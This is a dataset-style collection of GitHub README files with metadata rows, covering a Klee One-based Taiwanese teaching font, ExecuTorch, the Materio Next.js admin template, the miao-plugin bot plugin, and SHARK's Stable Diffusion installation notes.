* 「攵」字閉口。(配合 Klee 原始造形設計)
* **不嚴格處理筆劃是否接觸**,如宀、立、羊等字的點是否與下橫接觸等。「𧘇」部件亦保留 Klee 的左右接觸設計。
* 日、目、田⋯⋯等字的右下角閉口方式,目前均保留 Klee 原始設計(比照「口」),相關文字實在太多,無法全面修改。
* 「糹」做為左偏旁時,最左點的方向與標楷體不同,此為美觀考量。此字體中宮鬆較正方,三點均朝右難以站穩。如同「灬」,連續的點,最左方點朝左或朝右,應視為審美選擇。
* Klee One 原有收錄的字,但在 Big5 範圍外且非台客語漢字者,原則上先視為日文異體,保留原字形不進行調整。
即本專案以較寬鬆的方式解釋教育部標準字體的規定,如同思源宋體、思源黑體、蘋方等其他字型。
這樣的寫法是否已足夠應付學齡教學使用,盼大眾能提供反饋。
## 備註
1. 本字型目前尚為 Beta 測試版本,若發現有字符出現外框錯誤,請在 issues 回報,謝謝。
2. 部分文字是否符合教育部標準字體標準可能見仁見智。
3. 因人力有限,目前沒有計畫製作完整 Big5 字集甚至更多 Unicode 漢字。若有缺字,可考慮與 [霞鹜文楷](https://github.com/lxgw/LxgwWenKai) 等其他 Klee One 的中文補字專案混排使用。但無法保證為標準字體。
4. 本頁面圖片提供:王皓梅、陳建中
## 開源授權規定
* 本字型基於 SIL Open Font License 1.1,改造 Fontworks 發佈的 [Klee](https://github.com/fontworks-fonts/Klee) 開源專案。
* Klee 是 Fontworks 的商標。
* 芫荽 是本專案的保留名稱。
* 任何人可以無償使用此字型,包含商用。無須告知原作者。
* 您可自由傳送、分享此字型,或與其他軟體綑綁發行、銷售。捆包中必須同時包含授權文件檔(OFL.txt)。
* 您可自由改造、衍生此字型並公開。修改後的字型必須同樣以 [SIL OFL](https://scripts.sil.org/OFL) 進行發佈,並請勿使用字型的保留名稱。
* 依照 [SIL OFL](https://scripts.sil.org/OFL) 規定,**禁止單獨出售字型檔(ttf/otf)**。
## 芫荽家族
- [注音芫荽](https://github.com/ButTaiwan/bpmfvs) 芫荽的注音字型。
- [字咍芫荽](https://github.com/ButTaiwan/taigivs) 台語標音字型家族。
## 相關資料
- [Fontworks 株式会社](http://fontworks.co.jp) 提供原版字型: [Klee GitHub Page](https://github.com/fontworks-fonts/)
- [LXGW WenKai / 霞鹜文楷](https://github.com/lxgw/LxgwWenKai)
- [國字標準字體研訂原則](https://language.moe.gov.tw/001/upload/files/site_content/m0001/biau/c12.htm?open)
- [國字標準字體教師手冊](https://language.moe.gov.tw/001/Upload/files/SITE_CONTENT/M0001/STD/c4.htm?open)
## 請斗內QQ
個人維護開源字型工程浩大,有足夠的支持,才有持續改版、精進的空間。若您覺得此字型能幫助到您,麻煩贊助一下吧Q_Q
![請斗內](img/donatation240425.png)
信用卡(含國際信用卡)、超商條碼、超商代收,請 [點這裡](https://p.ecpay.com.tw/930AED7) 。
| 芫荽,基於 Klee One 改造的學習用台灣繁體字型 | null | 7 | 2 | 0 | 37 | 8 | 1 | 0 |
pytorch/executorch | # ExecuTorch
**ExecuTorch** is an end-to-end solution for enabling on-device inference
capabilities across mobile and edge devices including wearables, embedded
devices and microcontrollers. It is part of the PyTorch Edge ecosystem and
enables efficient deployment of PyTorch models to edge devices.
Key value propositions of ExecuTorch are:
- **Portability:** Compatibility with a wide variety of computing platforms,
from high-end mobile phones to highly constrained embedded systems and
microcontrollers.
- **Productivity:** Enabling developers to use the same toolchains and SDK from
PyTorch model authoring and conversion, to debugging and deployment to a wide
variety of platforms.
- **Performance:** Providing end users with a seamless and high-performance
experience due to a lightweight runtime and utilizing full hardware
capabilities such as CPUs, NPUs, and DSPs.
For a comprehensive technical overview of ExecuTorch and step-by-step tutorials,
please visit our documentation website [for the latest release](https://pytorch.org/executorch/stable/index.html) (or the [main branch](https://pytorch.org/executorch/main/index.html)).
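As a quick orientation, the ahead-of-time flow captures a PyTorch model with `torch.export`, lowers it through `exir`, and serializes it into a `.pte` file for the runtime. The sketch below follows the documented flow; exact API details can differ between releases, so treat it as illustrative rather than definitive.

```python
import torch
from torch.export import export
from executorch.exir import to_edge

# Minimal export sketch. TinyModel is a stand-in for your own module.
class TinyModel(torch.nn.Module):
    def forward(self, x):
        return torch.nn.functional.relu(x)

example_inputs = (torch.randn(1, 8),)
exported_program = export(TinyModel(), example_inputs)  # capture with torch.export
edge_program = to_edge(exported_program)                # lower to the Edge dialect
executorch_program = edge_program.to_executorch()       # ready-to-serialize program

with open("tiny_model.pte", "wb") as f:
    f.write(executorch_program.buffer)                  # the .pte consumed by the runtime
```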
## Feedback
We welcome any feedback, suggestions, and bug reports from the community to help
us improve our technology. Please use the [PyTorch
Forums](https://discuss.pytorch.org/c/executorch) for discussion and feedback
about ExecuTorch using the **ExecuTorch** category, and our [GitHub
repository](https://github.com/pytorch/executorch/issues) for bug reporting.
We recommend using the latest release tag from the
[Releases](https://github.com/pytorch/executorch/releases) page when developing.
## Directory Structure
```
executorch
├── backends # Backend delegate implementations.
├── build # Utilities for managing the build system.
├── codegen # Tooling to autogenerate bindings between kernels and the runtime.
├── configurations
├── docs # Static docs tooling.
├── examples # Examples of various user flows, such as model export, delegates, and runtime execution.
├── exir # Ahead-of-time library: model capture and lowering APIs.
| ├── _serialize # Serialize final export artifact.
| ├── backend # Backend delegate ahead of time APIs
| ├── capture # Program capture.
| ├── dialects # Op sets for various dialects in the export process.
| ├── emit # Conversion from ExportedProgram to ExecuTorch execution instructions.
| ├── operator # Operator node manipulation utilities.
| ├── passes # Built-in compiler passes.
| ├── program # Export artifacts.
| ├── serde # Graph module serialization/deserialization.
| ├── verification # IR verification.
├── extension # Extensions built on top of the runtime.
| ├── android # ExecuTorch wrappers for Android apps.
| ├── apple # ExecuTorch wrappers for iOS apps.
| ├── aten_util # Converts to and from PyTorch ATen types.
| ├── data_loader # 1st party data loader implementations.
| ├── evalue_util # Helpers for working with EValue objects.
| ├── gguf_util # Tools to convert from the GGUF format.
| ├── kernel_util # Helpers for registering kernels.
| ├── memory_allocator # 1st party memory allocator implementations.
| ├── module # A simplified C++ wrapper for the runtime.
| ├── parallel # C++ threadpool integration.
| ├── pybindings # Python API for executorch runtime.
| ├── pytree # C++ and Python flattening and unflattening lib for pytrees.
| ├── runner_util # Helpers for writing C++ PTE-execution tools.
| ├── testing_util # Helpers for writing C++ tests.
| ├── training # Experimental libraries for on-device training
├── kernels # 1st party kernel implementations.
| ├── aten
| ├── optimized
| ├── portable # Reference implementations of ATen operators.
| ├── prim_ops # Special ops used in executorch runtime for control flow and symbolic primitives.
| ├── quantized
├── profiler # Utilities for profiling runtime execution.
├── runtime # Core C++ runtime.
| ├── backend # Backend delegate runtime APIs.
| ├── core # Core structures used across all levels of the runtime.
| ├── executor # Model loading, initialization, and execution.
| ├── kernel # Kernel registration and management.
| ├── platform # Layer between architecture specific code and portable C++.
├── schema # ExecuTorch PTE file format flatbuffer schemas.
├── scripts # Utility scripts for size management, dependency management, etc.
├── sdk # Model profiling, debugging, and introspection.
├── shim # Compatibility layer between OSS and Internal builds
├── test # Broad scoped end-to-end tests.
├── third-party # Third-party dependencies.
├── util # Various helpers and scripts.
```
## License
ExecuTorch is BSD licensed, as found in the LICENSE file.
| On-device AI across mobile, embedded and edge for PyTorch | deep-learning,embedded,machine-learning,mobile,neural-network,tensor,gpu | 8 | 165 | 3,747 | 3,044 | 106 | 1,619 | 13 |
themeselection/materio-mui-nextjs-admin-template-free | <p align="center"></p>
<p align="center">
<a href="https://themeselection.com/item/materio-free-mui-nextjs-admin-template" target="_blank">
<img src="https://cdn.themeselection.com/ts-assets/materio/logo/logo.png" alt="materio-logo" width="60px" height="auto">
</a>
</p>
<h1 align="center">
<a href="https://themeselection.com/item/materio-free-mui-nextjs-admin-template" target="_blank" align="center">
Materio - Free MUI NextJS Admin Template
</a>
</h1>
<p align="center">Most Powerful & Comprehensive Free MUI NextJS Admin Dashboard Template built for developers!</p>
<p align="center">
<a href="https://github.com/themeselection/materio-mui-nextjs-admin-template-free/blob/main/LICENSE">
<img src="https://img.shields.io/github/license/themeselection/materio-mui-nextjs-admin-template-free" alt="license">
</a>
<img alt="GitHub Workflow Status" src="https://img.shields.io/github/actions/workflow/status/themeselection/materio-mui-nextjs-admin-template-free/deploy-demos.yml">
<a href="https://github.com/themeselection/materio-mui-nextjs-admin-template-free/releases">
<img src="https://img.shields.io/github/release/themeselection/materio-mui-nextjs-admin-template-free.svg" alt="GitHub release">
</a>
<a href="https://twitter.com/Theme_Selection" target="_blank">
<img alt="Twitter Follow" src="https://img.shields.io/twitter/follow/Theme_Selection">
</a>
</p>
<kbd>[![Materio - Free MUI NextJS Admin Template Demo Screenshot](https://cdn.themeselection.com/ts-assets/materio/materio-mui-nextjs-admin-template-free/marketing/materio-mui-nextjs-admin-template-free-github.png)](https://themeselection.com/item/materio-free-mui-nextjs-admin-template)</kbd>
## Introduction 🚀
If you're a developer looking for the most Powerful & comprehensive [Free MUI NextJS Admin Dashboard Template](https://themeselection.com/item/materio-free-mui-nextjs-admin-template) built for developers, rich with features, and highly customizable, look no further than Materio. We've followed the highest industry standards to bring you the very best admin template that is not only easy to use but highly scalable. Offering ultimate convenience and flexibility, you'll be able to build whatever application you want with very little hassle.
Build premium quality applications with ease. Use one of the most innovative [NextJS admin templates](https://themeselection.com/item/category/next-js-admin-template) to create eye-catching, high-quality WebApps. Your apps will be completely responsive, ensuring they'll look stunning and function flawlessly on desktops, tablets, and mobile devices.
Materio provides a template with TypeScript and JavaScript.
[View Demo](https://demos.themeselection.com/materio-mui-nextjs-admin-template-free/demo)
## Features 📋
- ⚡ [Next.js](https://nextjs.org) with App Router support
- 💎 Integrated with [MUI](https://mui.com) & [Tailwind CSS](https://tailwindcss.com)
- ✅ [TypeScript](https://www.typescriptlang.org) & JavaScript Support
- 📏 Linter with [ESLint](https://eslint.org)
- 💖 Code Formatter with [Prettier](https://prettier.io)
- 🗂 VSCode configuration: Settings, Extensions and Custom Snippets
- 💡 Absolute Imports with aliases
- ☕ Minify HTML & CSS
- 💨 Live reload
- ✅ Cache busting
- 🛠️ Easy to customize
- 😎 SEO-friendly
- 🚀 Production-ready
## Requirements ✅
- Node.js LTS version (not current version)
- npm
## Installation ⚒️
Installing and running the template is super easy in Materio, please follow these steps and you should be ready to rock 🤘:
1. Make sure you have installed Node.js (LTS). If Node.js is already installed in your system, make sure the installed version is LTS (and not the latest version)
2. Navigate to the `typescript-version` or `javascript-version` folder and run the following command to install our local dependencies listed in the `package.json` file. You can use `pnpm`, `yarn` or `npm` as per your preference
> It is recommended to use pnpm for better dependency management
```bash
# For pnpm (recommended)
pnpm install
# For yarn
yarn install
# For npm
npm install
```
3. Rename the `.env.example` file to `.env` file
4. Now, you are ready to start the server with the help of the command shown below. Open [http://localhost:3000](http://localhost:3000) to check your development 🚀.
```bash
# For pnpm (recommended)
pnpm dev
# For yarn
yarn dev
# For npm
npm run dev
```
## What's Included 📦
- Layouts
- Blank
- Full
- Boxed
- Dashboard
- Pages
- Account Settings
- Login
- Register
- Forgot Password
- Error
- Under Maintenance
- Iconify Icons
- Basic Cards
- Form Layouts
## What's in Premium Version 💎
| Materio Free Version | Materio Premium Version |
| ----------------------------------------------- | :------------------------------------------------ |
| [Demo](https://demos.themeselection.com/materio-mui-nextjs-admin-template-free/demo) | [Demo](https://demos.themeselection.com/materio-mui-nextjs-admin-template/demo-1) |
| [Download](https://themeselection.com/item/materio-free-mui-nextjs-admin-template) | [Purchase](https://themeselection.com/item/materio-free-mui-nextjs-admin-template) |
| Single vertical menu | Vertical (+ vertical collapsed) & Horizontal menu |
| Default skin | Default, bordered & semi-dark skin |
| 1 simple dashboard | 5 niche dashboards |
| - | 10 Applications including eCommerce, academy, email, chat, calendar, invoice, kanban, etc. |
| Simple form layouts | Advanced form layouts, form validation & form wizard |
| Basic cards | Basic, advanced, statistics, charts, gamification & action cards |
| - | Quick search - quickly navigate between pages (with hotkey support) |
| Basic tables | Advanced tables |
| 1 chart library | 2 chart libraries |
| 6 pages | 35+ pages |
| Simple navbar & footer | Multiple navbar & footer options |
| - | Authentication using NextAuth |
| - | RTL (right-to-left) support |
| - | Redux toolkit |
| - | Multi-lingual support |
| - | Starter-kit |
| - | Customizer drawer to check options in live app |
| Limited customization | Endless customization possibilities |
| Regular support | Priority support |
## Documentation 📜
Check out our live [Documentation](https://demos.themeselection.com/materio-mui-nextjs-admin-template/documentation)
## Deployment 🚀
Check out our [Deployment docs](https://demos.themeselection.com/materio-mui-nextjs-admin-template/documentation/docs/guide/deployment)
## Browser Support 🖥️
![chrome](https://github.com/nuxt/nuxt/assets/47495003/bbb6d7b0-2db6-4af4-abdc-a73de71dd287)
![firefox](https://github.com/nuxt/nuxt/assets/47495003/bca1f2d0-d597-453b-8525-5c94e36bfc33)
![safari](https://github.com/nuxt/nuxt/assets/47495003/8ecbb395-78fb-40fb-bb59-7301bf8a7e5d)
![Microsoft Edge](https://github.com/nuxt/nuxt/assets/47495003/f945821b-0cbd-464d-8103-824d4d5c4e9a)
*_It also supports other browsers which implement the latest CSS standards._
## Contributing 🦸
Contributions are always welcome and recommended! Here is how:
* Fork the repository ([here is the guide](https://docs.github.com/en/get-started/quickstart/fork-a-repo)).
* Clone it to your machine: `git clone https://github.com/YOUR_USERNAME/REPO_NAME`
* Make your changes
* Create a pull request
### Contribution Requirements 🧰
* When you contribute, you agree to give a non-exclusive license to ThemeSelection to use that contribution in any context as we (ThemeSelection) see appropriate.
* If you use content provided by another party, it must be appropriately licensed using an open source license.
* Contributions are only accepted through Github pull requests.
* Finally, contributed code must work in all supported browsers (see above for browser support).
## Changelog 📆
Please refer to the [CHANGELOG](CHANGELOG.md) file. We will add detailed release notes to each new release.
## Support 🧑🏻💻
For free products, enjoy community support via GitHub issues. Upgrade to Premium for dedicated support from our expert team.
## License ©
- Copyright © [ThemeSelection](https://themeselection.com/)
- Licensed under [MIT](LICENSE)
- All our free items are Open Source and licensed under MIT. You can use our free items for personal as well as commercial purposes. We just need an attribution from your end. Copy the below link and paste it at the footer of your web application or project.
```html
<a href="https://themeselection.com/">ThemeSelection</a>
```
## Also Available In
<p>
<!-- Figma -->
<a href="https://themeselection.com/item/materio-figma-admin-dashboard-ui-kit" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/0318a6c8-4f9b-4cf6-af5e-d357f909ea2b"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/47f21dfe-c1fc-4a7d-859e-4d98f8cdded1"><img width="auto" height="74px" alt="html" src="https://github.com/microsoft/vscode/assets/47495003/47f21dfe-c1fc-4a7d-859e-4d98f8cdded1"></picture></img></a>
<!-- HTML -->
<a href="https://themeselection.com/item/materio-dashboard-pro-bootstrap" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/5fe77c46-2e4c-475a-8dec-e30e2badddee"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/3f5decd8-cd99-4ed3-aa76-528ca061385b"><img width="auto" height="74px" alt="html" src="https://github.com/microsoft/vscode/assets/47495003/3f5decd8-cd99-4ed3-aa76-528ca061385b"></picture></img></a>
<!-- HTML + Laravel -->
<a href="https://themeselection.com/item/materio-dashboard-pro-laravel" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/efe420e4-9863-41b7-9eda-47ea94f21a62"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/be3b86e0-4d5e-4736-bf89-4267fb4d6710"><img width="auto" height="74px" alt="html_laravel" src="https://github.com/microsoft/vscode/assets/47495003/be3b86e0-4d5e-4736-bf89-4267fb4d6710"></picture></img></a>
<!-- HTML + Django -->
<a href="https://themeselection.com/item/materio-dashboard-pro-django" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/3c87d33b-1223-4aaa-a652-388dcb714c98"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/51db1947-eac1-466f-87fd-5a209010fe9c"><img width="auto" height="74px" alt="html_django" src="https://github.com/microsoft/vscode/assets/47495003/51db1947-eac1-466f-87fd-5a209010fe9c"></picture></img></a>
<!-- .Net Core -->
<a href="https://themeselection.com/item/materio-aspnet-core-mvc-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/6327fd7b-9c54-4189-a852-28551ad0e002"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/9856e9d5-021f-4573-902a-702e80dd0102"><img width="auto" height="74px" alt="net_core" src="https://github.com/microsoft/vscode/assets/47495003/9856e9d5-021f-4573-902a-702e80dd0102"></picture></img></a>
<!-- NextJS -->
<a href="https://themeselection.com/item/materio-mui-nextjs-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/66344629-6d21-4f92-9078-f479b39cb34e"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/e1daf4e1-3fa5-4a44-969a-6143ddd67310"><img width="auto" height="74px" alt="next.js" src="https://github.com/microsoft/vscode/assets/47495003/e1daf4e1-3fa5-4a44-969a-6143ddd67310"></picture></img></a>
<!-- Vue -->
<a href="https://themeselection.com/item/materio-vuetify-vuejs-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/881bbbb8-d1c9-421c-9bce-4ea43dfa9e6e"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/b02d6473-0345-42c2-be58-e648806104fa"><img width="auto" height="74px" alt="vue" src="https://github.com/microsoft/vscode/assets/47495003/b02d6473-0345-42c2-be58-e648806104fa"></picture></img></a>
<!-- Vue + Laravel -->
<a href="https://themeselection.com/item/materio-vuetify-vuejs-laravel-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/20b6428e-3fa5-4f80-a389-9e4cd732c2de"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/3008d3eb-7b5b-4d9c-8563-837744a901da"><img width="auto" height="74px" alt="vue_laravel" src="https://github.com/microsoft/vscode/assets/47495003/3008d3eb-7b5b-4d9c-8563-837744a901da"></picture></img></a>
<!-- Nuxt -->
<a href="https://themeselection.com/item/materio-vuetify-nuxtjs-admin-template" target="_blank"><picture><source width="auto" height="74px" media="(prefers-color-scheme: dark)" srcset="https://github.com/microsoft/vscode/assets/47495003/d9d3cf2e-4dc5-49fe-b146-b80ef010cb57"><source width="auto" height="74px" media="(prefers-color-scheme: light)" srcset="https://github.com/microsoft/vscode/assets/47495003/f18ba562-6bba-4a55-83ac-962ecefa636f"><img width="auto" height="74px" alt="nuxt" src="https://github.com/microsoft/vscode/assets/47495003/f18ba562-6bba-4a55-83ac-962ecefa636f"></picture></img></a>
</p>
## Looking For Premium Admin Templates ?? 👀
**[ThemeSelection](https://themeselection.com/)** provides Selected high quality, modern design, professional and easy-to-use **Fully Coded Dashboard Templates & UI Kits** to create your applications faster!
- [Bootstrap Admin Templates](https://themeselection.com/item/category/bootstrap-admin-template/)
- [VueJS Admin Templates](https://themeselection.com/item/category/vuejs-admin-templates/)
- [Laravel Admin Templates](https://themeselection.com/item/category/laravel-admin-templates/)
- [Django Admin Templates](https://themeselection.com/item/category/django-admin-template/)
- [React (NextJS) Admin Templates](https://themeselection.com/item/category/next-js-admin-template/)
- [ASP.Net Core Admin Templates](https://themeselection.com/item/category/asp-net-dashboard/)
- [Free UI Kits](https://themeselection.com/item/category/free-ui-kits/)
If you want to [Download Free Admin Templates](https://themeselection.com/item/category/free-admin-templates/) like Materio then do visit [ThemeSelection](https://themeselection.com/).
## Useful Links 🎁
* [Vue CheatSheet](https://vue-cheatsheet.themeselection.com/)
* [Freebies](https://themeselection.com/item/category/free-admin-templates/)
* [Download Free Admin Templates](https://themeselection.com/item/category/free-admin-templates/)
* [Bootstrap 5 CheatSheet](https://bootstrap-cheatsheet.themeselection.com/)
## Social Media :earth_africa:
- [Twitter](https://twitter.com/Theme_Selection)
- [Facebook](https://www.facebook.com/ThemeSelections/)
- [Pinterest](https://pinterest.com/themeselect/)
- [Instagram](https://www.instagram.com/themeselection/)
- [Discord](https://discord.gg/kBHkY7DekX)
- [YouTube](https://www.youtube.com/channel/UCuryo5s0CW4aP83itLjIdZg)
| An enterprise-grade Next.js admin dashboard template. Made with developer experience first: Next.js v14 (App Router), Material UI (MUI), Tailwind CSS, TypeScript, ESLint, Prettier, VSCode Configs !! 🚀 | admin-dashboard,admin-template,freebies,admin-dashboard-template,dashboard-template,nextjs-admin,boilerplate,free-admin-dashboard,free-admin-template,javascript | 2 | 21 | 16 | 45 | 0 | 2 | 4 |
yoimiya-kokomi/miao-plugin | # Miao-Plugin 说明
`miao-plugin`是一个`Yunzai-Bot`的升级插件,提供包括角色面板、角色查询等角色相关功能。
具体功能可在安装插件后 通过 `#喵喵帮助` 进行查看。如需进行设置则可通过 `#喵喵设置` 命令进行管理。
---
## 安装与更新
### 使用Git安装(推荐)
请将 miao-plugin 放置在 Yunzai-Bot 的 plugins 目录下,重启 Yunzai-Bot 后即可使用。
请使用 git 进行安装,以方便后续升级。在 Yunzai-Bot 根目录夹打开终端,运行下述指令之一
```
// 使用gitee
git clone --depth=1 https://gitee.com/yoimiya-kokomi/miao-plugin.git ./plugins/miao-plugin/
pnpm install -P
// 使用github
git clone --depth=1 https://github.com/yoimiya-kokomi/miao-plugin.git ./plugins/miao-plugin/
pnpm install -P
```
进行安装。安装完毕后,管理员只需发送 `#喵喵更新` 即可自动更新 miao-plugin。
### 手工下载安装(不推荐)
手工下载安装包,解压后将`miao-plugin-master`更名为`miao-plugin`,然后放置在Yunzai的plugins目录内
虽然此方式能够使用,但无法使用`#喵喵更新`进行更新,不利于后续升级,故不推荐使用
---
## Yunzai版本与支持
`miao-plugin` 支持V3 / V2 版本的Yunzai-Bot
* [Miao-Yunzai](https://github.com/yoimiya-kokomi/Miao-Yunzai) : 喵版Yunzai [Gitee](https://gitee.com/yoimiya-kokomi/Miao-Yunzai)
/ [Github](https://github.com/yoimiya-kokomi/Miao-Yunzai) ,本体不含签到功能,功能迭代较多,与miao-plugin打通,只建议新部署/迁移
* [Yunzai-V3](https://github.com/yoimiya-kokomi/Yunzai-Bot) :Yunzai V3 - 喵喵维护版,icqq版本,与原版Yunza功能基本一致,会保持卡池更新,功能相对稳定,可从原版Yunzai换源直接升级
* [Yunzai-V3](https://gitee.com/Le-niao/Yunzai-Bot) :Yunzai V3 - 乐神原版,oicq版本,可能会遇到登录问题
---
## 功能说明
### #雷神面板
使用指令 `#面板帮助` 即可了解如何使用此功能。
#### #更新面板
`#更新面板` 依赖于面板查询API,面板服务由 http://enka.network/ 提供。
> 查询功能经Enka官方授权([issue#63](https://github.com/yoimiya-kokomi/miao-plugin/issues/63#issuecomment-1199348789)),感谢Enka提供的面板查询服务
>
> 如果可以的话,也请在Patreon上支持Enka,或提供闲置的原神账户,具体可在[Enka官网](http://enka.network/) Discord联系
>
> [issue#63](https://github.com/yoimiya-kokomi/miao-plugin/issues/63#issuecomment-1199734496)
> 可尝试使用`MiniGG-Api`面板服务 [@MiniGrayGay](https://github.com/MiniGrayGay)<br>
> 发送 `#喵喵设置面板服务332` 修改国服&B服的面板查询由 `MiniGG-Api` 处理
#### #雷神伤害
喵喵面板附带的伤害计算功能由喵喵本地计算。如计算有偏差 #雷神伤害 查看伤害加成信息,如确认伤害计算有误可提供伤害录屏截图及uid进行反馈
#### #雷神圣遗物
圣遗物评分为喵喵版评分规则
---
**在有一定阅读理解能力基础下,建议阅读 [CHANGELOG.md](CHANGELOG.md) 以了解更多内容。**
其余文档咕咕咕中
---
# 免责声明
1. `miao-plugin`自身的UI与代码均开放,无需征得特殊同意,可任意使用。能备注来源最好,但不强求
2. 以上声明但仅代表`miao-plugin`自身的范畴,请尊重Yunzai本体及其他插件作者的努力,勿将Yunzai及其他插件用于以盈利为目的的场景
3. miao-plugin的图片与其他素材均来自于网络,仅供交流学习使用,如有侵权请联系,会立即删除
# 资源
* [Miao-Yunzai](https://github.com/yoimiya-kokomi/Miao-Yunzai) : 喵版Yunzai [Gitee](https://gitee.com/yoimiya-kokomi/Miao-Yunzai)
/ [Github](https://github.com/yoimiya-kokomi/Miao-Yunzai)
* [Yunzai-V3](https://github.com/yoimiya-kokomi/Yunzai-Bot) :Yunzai V3 - 喵喵维护版(使用 icqq)
* [Yunzai-V3](https://gitee.com/Le-niao/Yunzai-Bot) :Yunzai V3 - 乐神原版(使用 oicq)
* [miao-plugin](https://github.com/yoimiya-kokomi/miao-plugin) : 喵喵插件 [Gitee](https://gitee.com/yoimiya-kokomi/miao-plugin)
/ [Github](https://github.com/yoimiya-kokomi/miao-plugin)
# 其他&感谢
* [Enka.Network](https://enka.network/): 感谢Enka提供的面板服务
* [Snap.Hutao](https://hut.ao/) : 感谢 DGP Studio 开发的 [胡桃 API](https://github.com/DGP-Studio/Snap.Hutao.Server)
* QQ群(暂时停止新加入,请见谅)
* Yunzai-Bot 官方QQ群:213938015
* 喵喵Miao-Plugin QQ群:607710456
* [爱发电](https://afdian.net/@kokomi) :欢迎老板打赏,喵~
| Miao-Plugin for Yunzai-Bot | null | 0 | 65 | 188 | 1,225 | 138 | 2 | 0 |
nod-ai/SHARK | # SHARK
High Performance Machine Learning Distribution
*We are currently rebuilding SHARK to take advantage of [Turbine](https://github.com/nod-ai/SHARK-Turbine). Until that is complete make sure you use an .exe release or a checkout of the `SHARK-1.0` branch, for a working SHARK*
[![Nightly Release](https://github.com/nod-ai/SHARK/actions/workflows/nightly.yml/badge.svg)](https://github.com/nod-ai/SHARK/actions/workflows/nightly.yml)
[![Validate torch-models on Shark Runtime](https://github.com/nod-ai/SHARK/actions/workflows/test-models.yml/badge.svg)](https://github.com/nod-ai/SHARK/actions/workflows/test-models.yml)
<details>
<summary>Prerequisites - Drivers </summary>
#### Install your Windows hardware drivers
* [AMD RDNA Users] Download the latest driver (23.2.1 is the oldest supported) [here](https://www.amd.com/en/support).
* [macOS Users] Download and install the 1.3.216 Vulkan SDK from [here](https://sdk.lunarg.com/sdk/download/1.3.216.0/mac/vulkansdk-macos-1.3.216.0.dmg). Newer versions of the SDK will not work.
* [Nvidia Users] Download and install the latest CUDA / Vulkan drivers from [here](https://developer.nvidia.com/cuda-downloads)
#### Linux Drivers
* MESA / RADV drivers won't work with FP16. Please use the latest AMDGPU-PRO drivers (non-pro OSS drivers also won't work) or the latest NVIDIA Linux drivers.
Other users, please ensure you have the latest vendor drivers and the Vulkan SDK from [here](https://vulkan.lunarg.com/sdk/home); if you are using Vulkan, check that `vulkaninfo` works in a terminal window.
</details>
### Quick Start for SHARK Stable Diffusion for Windows 10/11 Users
Install the driver from [Prerequisites](https://github.com/nod-ai/SHARK#install-your-hardware-drivers) above.
Download the [stable release](https://github.com/nod-ai/shark/releases/latest) or the most recent [SHARK 1.0 pre-release](https://github.com/nod-ai/shark/releases).
Double click the .exe, or [run from the command line](#running) (recommended), and you should have the [UI](http://localhost:8080/) in the browser.
If you have custom models put them in a `models/` directory where the .exe is.
Enjoy.
<details>
<summary>More installation notes</summary>
* We recommend that you download EXE in a new folder, whenever you download a new EXE version. If you download it in the same folder as a previous install, you must delete the old `*.vmfb` files with `rm *.vmfb`. You can also use `--clear_all` flag once to clean all the old files.
* If you recently updated the driver or this binary (EXE file), we recommend you clear all the local artifacts with `--clear_all`
## Running
* Open a Command Prompt or Powershell terminal, change folder (`cd`) to the .exe folder. Then run the EXE from the command prompt. That way, if an error occurs, you'll be able to cut-and-paste it to ask for help. (if it always works for you without error, you may simply double-click the EXE)
* The first run may take few minutes when the models are downloaded and compiled. Your patience is appreciated. The download could be about 5GB.
* You will likely see a Windows Defender message asking you to give permission to open a web server port. Accept it.
* Open a browser to access the Stable Diffusion web server. By default, the port is 8080, so you can go to http://localhost:8080/.
* If you prefer to always run in the browser, use the `--ui=web` command argument when running the EXE.
## Stopping
* Select the command prompt that's running the EXE. Press CTRL-C and wait a moment or close the terminal.
</details>
<details>
<summary>Advanced Installation (Only for developers)</summary>
## Advanced Installation (Windows, Linux and macOS) for developers
### Windows 10/11 Users
* Install Git for Windows from [here](https://git-scm.com/download/win) if you don't already have it.
## Check out the code
```shell
git clone https://github.com/nod-ai/SHARK.git
cd SHARK
```
## Switch to the Correct Branch (IMPORTANT!)
Currently SHARK is being rebuilt for [Turbine](https://github.com/nod-ai/SHARK-Turbine) on the `main` branch. For now you are strongly discouraged from using `main` unless you are working on the rebuild effort, and you should not expect the code there to produce a working application for image generation. So for now you'll need to switch over to the `SHARK-1.0` branch and use the stable code.
```shell
git checkout SHARK-1.0
```
The following setup instructions assume you are on this branch.
## Setup your Python VirtualEnvironment and Dependencies
### Windows 10/11 Users
* Install the latest Python 3.11.x version from [here](https://www.python.org/downloads/windows/)
#### Allow the install script to run in Powershell
```powershell
set-executionpolicy remotesigned
```
#### Setup venv and install necessary packages (torch-mlir, nodLabs/Shark, ...)
```powershell
./setup_venv.ps1 #You can re-run this script to get the latest version
```
### Linux / macOS Users
```shell
./setup_venv.sh
source shark1.venv/bin/activate
```
